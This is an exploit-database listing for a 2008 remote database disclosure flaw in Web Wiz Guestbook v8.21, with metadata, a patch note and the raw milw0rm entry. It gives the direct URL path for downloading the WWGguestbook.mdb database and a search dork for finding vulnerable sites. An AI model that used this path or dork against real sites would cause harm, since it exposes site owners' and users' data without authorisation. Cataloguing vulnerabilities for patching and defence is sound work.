header-logo
Suggest Exploit
vendor:
Web Wiz Guestbook
by:
Cold z3ro
8.8
CVSS
HIGH
Remote Database Disclosure
200
CWE
Product Name: Web Wiz Guestbook
Affected Version From: v8.21
Affected Version To: v8.21
Patch Exists: YES
Related CWE: N/A
CPE: a:web_wiz:web_wiz_guestbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Web Wiz Guestbook v8.21 (WWGguestbook.mdb) Remote Database Disclosure Vulnerability

A vulnerability in Web Wiz Guestbook v8.21 allows an attacker to remotely access the WWGguestbook.mdb database. This can be done by accessing the URL http://site.com/[Path]/database/WWGguestbook.mdb. The vulnerability can be found by using the dork webwizguestbook_license.asp.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of Web Wiz Guestbook.
Source

Exploit-DB raw data:

< > =============
< >
< >  Web Wiz Guestbook v8.21 (WWGguestbook.mdb) Remote Database Disclosure Vulnerability
< >
< >  auther : Cold z3ro, www.hackteach.org
< >
< >  http://site.com/[Path]/database/WWGguestbook.mdb
< >
< >  Dork : webwizguestbook_license.asp
< >
< > =============

# milw0rm.com [2008-12-16]

Navigation

Suggest Exploit

Services By CQR